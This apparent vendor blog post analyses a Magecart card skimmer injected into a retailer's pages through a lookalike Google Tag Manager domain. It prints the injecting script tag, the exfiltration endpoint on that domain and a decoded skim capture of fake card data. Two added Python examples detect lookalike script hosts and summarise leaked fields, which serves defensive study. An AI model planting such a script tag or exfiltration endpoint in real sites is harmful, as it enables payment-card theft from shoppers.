We put a lot of thought into our data breach detection engine: a real-time production monitoring solution made up of three main layers that combines human intelligence logic with our AI anomaly detection, giving us the tools to detect known threats and prepare for future attacks.

Last month our team discovered dozens of sites with live credit card skimmers, which we identified as Magecart activity, including one of the largest consumer electronics retailers in the UK and a well-known sports apparel brand from France. We alerted the relevant CISOs, who immediately acted to secure their customers’ information.

As a result, we now have new clients and have grown our bank of authentic attacks, from which I’m going to share an example.

To demonstrate the flow of the malicious activity, we will walk through a live example of one of the data breaches identified by our external monitoring solution, Intelligence Pro. To protect our clients’ privacy, we will not share their identity, and site information will not be disclosed.

To keep this post simple, I also won’t delve into how the malicious JavaScript was injected in the first place; I will just point out that this is not a difficult step given the first- and third-party vulnerabilities present on the client side.

The malware is embedded locally in all known pages of the site, at the end of each page, via the following JavaScript snippet: <script src="https://googletagmanager.eu/gtm.js"></script>. Note the Google Tag Manager lookalike domain googletagmanager.eu in place of the genuine googletagmanager.com.

This script tag loads a remote script: a generic eCommerce credit card skimmer belonging to the Magecart family of attacks. The script contains the full malicious code, which exfiltrates the following data to the attacker’s server:

  • Credit card number, expiration date, CVV code
  • Full name
  • Billing address
  • Shipping address

This malware is a known card skimmer operating from a malicious server at hxxps://googletagmanager.eu, with hxxps://googletagmanager.eu/gtm.js delivering the eCommerce credit card skimming code. After collecting the compromised data, it sends the user’s private information and credit card details to hxxps://www.googletagmanager.eu/ga.js, as seen in the image below:
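The injection described above relies on a lookalike of a trusted tag-manager host. The following Python script is an added example, not part of the original post or of ChameleonX’s Intelligence Pro product: it collects every script src on a page, skips same-origin loads, and classifies each external host as allowed, a lookalike (same second-level label as an allowed host but a different domain, as with googletagmanager.eu versus googletagmanager.com) or unknown. The allowlist, the placeholder hosts and the page fragment are constructed for the example; a real deployment would build the allowlist from a known-good crawl of the site and use a public-suffix list instead of the simplified label extraction shown here.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed allowlist: the script hosts this hypothetical shop is expected to load.
ALLOWED_SCRIPT_HOSTS = {
    "www.googletagmanager.com",
    "www.google-analytics.com",
    "cdn.shop-example.invalid",  # placeholder first-party CDN
}


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def registrable_label(host):
    """Second-level label of a host: 'googletagmanager' for www.googletagmanager.eu.

    Simplification: multi-part public suffixes such as co.uk are not handled;
    use a public-suffix list for production checks."""
    parts = host.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def classify_script_host(host, allowed=ALLOWED_SCRIPT_HOSTS):
    """'allowed' (on the list), 'lookalike' (same label as an allowed host but a
    different domain) or 'unknown' (never seen before)."""
    host = host.lower()
    if host in allowed:
        return "allowed"
    if registrable_label(host) in {registrable_label(h) for h in allowed}:
        return "lookalike"
    return "unknown"


def audit_page(html, page_host):
    """List (src, verdict) for every script the page loads from another host."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.srcs:
        host = urlsplit(src).hostname
        if host is None or host == page_host.lower():
            continue  # relative path or same-origin script: not a third-party load
        findings.append((src, classify_script_host(host)))
    return findings


# Constructed page fragment: one genuine tag-manager load, one lookalike of the
# kind described in the post, and one host that is simply not on the allowlist.
SAMPLE_HTML = """
<html><body>
<script src="/js/checkout.js"></script>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-PLACEHOLDER"></script>
<script src="https://cdn.some-vendor.invalid/widget.js"></script>
<script src="https://googletagmanager.eu/gtm.js"></script>
</body></html>
"""

if __name__ == "__main__":
    for src, verdict in audit_page(SAMPLE_HTML, "shop-example.invalid"):
        print(f"{verdict:10s} {src}")
```

Run against the sample page, the script reports the googletagmanager.eu load as a lookalike and the vendor CDN as unknown while the real tag manager passes; both non-allowed verdicts are worth an alert, but a lookalike of a host the site already trusts is the higher-priority one, since it is designed to be overlooked in a script inventory.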

To hide the leak, the stolen data is passed through a simple encoding before transmission, a common obfuscation method that is trivial to reverse:

Original Skimming Form Data:


Decoded Skimming Form Data, containing all the private information the user entered during the purchase flow, including the credit card (all of the information entered is random/fake):

nullbilling_address_id=12608&billing[address_id]=262762&billing[firstname]=Alvin&billing[lastname]=Neal&billing[taxvat]=743.599.320-49&billing[telephone]=(457) 309-2591&billing[postcode]=21321-123&billing[street][]=Nifok Gln&billing[street][]=1245 &billing[street][]=Nifok Gln&billing[street][]=1245&billing[city]=Rio&billing[region_id]=489&billing[country_id]=BR&billing[save_in_address_book]=1&billing[use_for_shipping]=1&shipping_address_id=12608&shipping[address_id]=262763&shipping[firstname]=Alvin&shipping[lastname]=Neal&shipping[telephone]=(457) 309-2591&shipping[postcode]=21321-123&shipping[street][]=Nifok Gln&shipping[street][]=1245 &shipping[street][]=Nifok Gln&shipping[street][]=1245&shipping[city]=Rio&shipping[region_id]=489&shipping[country_id]=BR&shipping[save_in_address_book]=1&shipping[same_as_billing]=1&shipping_method=mp_multi_shipping_mp_multi_shipping&selected_shipping[1155][items]=156969&form_key=5yFyPLqjpgEFJ99G&payment[method]=mercadopago_custom&=Aplicar&payment[mercadopago_custom][paymentMethodSelector]=-1&=4111111111111111&payment[mercadopago_custom][cardExpirationMonth]=4&payment[mercadopago_custom][cardExpirationYear]=2023&payment[mercadopago_custom][cardholderName]=Alvin Neal&=654&payment[mercadopago_custom][docType]=CPF&payment[mercadopago_custom][docNumber]=72535534622&payment[mercadopago_custom][issuer_id]=-1&payment[mercadopago_custom][installments]=1&payment[mercadopago_custom][site_id]=MLB&payment[mercadopago_custom][amount]=92&payment[mercadopago_custom][total_amount]=92&payment[mercadopago_custom][paymentMethodId]=visa&payment[mercadopago_custom][token]=f4ce14ab9d83404d93adfd84af6a0b79&payment[mercadopago_custom][cardTruncated]=4111 11** **** 1111&payment[mercadopago_custom][customer_id]=395923734-RyFnhEbljk8ybu&form_key=5yFyPLqjpgEFJ99G&
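Once a capture like the one above is decoded, the next question for an incident responder is what actually left the site. The Python below is an added example, not code from the post or from ChameleonX: it decodes a captured body, parses it as a form submission, finds every Luhn-valid card number regardless of the field name it sits in (the skimmed card fields in the decoded data above have empty names, so searching by field name alone would miss them) and lists the personal-data fields, masking the card number so the report is not itself a card leak. The post does not reproduce the skimmer’s real encoding, so base64 over the raw form body is assumed here as a stand-in; the form body is constructed from a shortened version of the fake data shown above.

```python
import base64
import re
from urllib.parse import parse_qs

# Any 13-19 digit run is a candidate primary account number (PAN).
PAN_RE = re.compile(r"\b\d{13,19}\b")

# Field-name fragments that indicate personal data (constructed list, matched case-insensitively).
PII_MARKERS = ("firstname", "lastname", "telephone", "street", "city",
               "postcode", "cardholdername", "docnumber")


def luhn_valid(digits):
    """Luhn checksum: separates real card numbers from other long digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan):
    """Keep the BIN and last four digits, mask the rest."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def decode_payload(encoded):
    """Assumed encoding for this example: base64 of the raw form body."""
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


def summarise_exfil(form_body):
    """Report how many fields leaked, which carry a card number and which carry PII."""
    fields = parse_qs(form_body, keep_blank_values=True)
    report = {"field_count": len(fields), "pan_fields": [], "pii_fields": []}
    for name, values in fields.items():
        for value in values:
            for candidate in PAN_RE.findall(value):
                if luhn_valid(candidate):
                    # Empty field names occur in the real capture; label them explicitly.
                    report["pan_fields"].append((name or "<unnamed>", mask_pan(candidate)))
        if any(marker in name.lower() for marker in PII_MARKERS):
            report["pii_fields"].append(name)
    report["pii_fields"].sort()
    return report


# Constructed sample body: a shortened version of the fake data in the post,
# including the two unnamed fields that hold the card number and CVV.
SAMPLE_FORM_BODY = (
    "billing[firstname]=Alvin&billing[lastname]=Neal&billing[telephone]=(457) 309-2591"
    "&billing[street][]=Nifok Gln&billing[city]=Rio&payment[method]=mercadopago_custom"
    "&=4111111111111111&payment[mercadopago_custom][cardExpirationMonth]=4"
    "&payment[mercadopago_custom][cardExpirationYear]=2023"
    "&payment[mercadopago_custom][cardholderName]=Alvin Neal&=654"
    "&payment[mercadopago_custom][cardTruncated]=4111 11** **** 1111"
)
SAMPLE_ENCODED = base64.b64encode(SAMPLE_FORM_BODY.encode()).decode()

if __name__ == "__main__":
    result = summarise_exfil(decode_payload(SAMPLE_ENCODED))
    print(f"{result['field_count']} fields leaked")
    print("card numbers:", result["pan_fields"])
    print("PII fields:", result["pii_fields"])
```

The masked output is what belongs in an incident ticket; the BIN and last four are enough for the acquirer and card brands to act on, while the full PAN never needs to be written to a log a second time.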

ChameleonX Intelligence Pro detected this data breach immediately upon activation of the external site scan. While this is a fairly simple form of attack, it is unknown how long it had been active prior to our detection.

Detection time is a critical factor: in the similar Magecart attacks that made news globally, including large brands such as British Airways, Ticketmaster and Newegg, the time to detection averaged 30 to 45 days.

In today’s web business environment, where businesses rely on third-party services to grow, supply chain attacks are all but impossible to prevent, since there is no control over vendors’ security protocols or their obligations to customer privacy. This makes detection time a crucial factor in the consequences of a data breach.